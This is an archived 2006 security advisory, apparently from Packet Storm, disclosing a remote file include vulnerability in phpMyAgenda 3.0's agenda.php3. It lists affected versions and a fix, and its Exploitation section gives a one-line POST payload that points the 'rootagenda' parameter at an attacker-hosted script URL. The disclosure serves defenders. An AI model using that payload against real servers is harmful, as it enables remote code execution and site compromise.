phpMyAgenda-3.0.txt

2006-04-28T00:00:00
ID PACKETSTORM:45858
Type packetstorm
Reporter David Vieira-Kurz
Modified 2006-04-28T00:00:00

Description

                                        
                                            `[MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability   
--------------------------------------------------------  
Software: phpMyAgenda  
Version: 3.0 Final  
Type: Remote File Include Vulnerability  
Date: April, 24th 2006  
Vendor: phpMyAgenda  
Page: http://phpmyagenda.com  
Risc: High  
  
  
Credits:  
----------------------------  
Discovered by: 'Aesthetico'  
http://www.majorsecurity.de  
  
  
Affected Products:  
----------------------------  
phpMyAgenda 3.0 Final and prior  
  
  
Description:  
----------------------------  
phpMyAgenda is a complete web application that allows you to manage   
and publish events (concert, meetings, etc...).  
It stores description, dates, places, contacts, event registrations, and event polls.  
  
  
Requirements:  
----------------------------  
register_globals = On  
  
  
Vulnerability:  
----------------------------  
Input passed to the "rootagenda" parameter in "agenda.php3" is not  
properly verified, before it is used to include files.   
This can be exploited to execute arbitrary code by including files from external resources.  
  
  
Solution:  
----------------------------  
Edit the source code to ensure that input is properly sanitised.  
  
Set "register_globals" to "Off".  
  
  
Exploitation:  
----------------------------  
Post data:  
rootagenda=http://www.yourspace.com/yourscript.php?  
  
  
`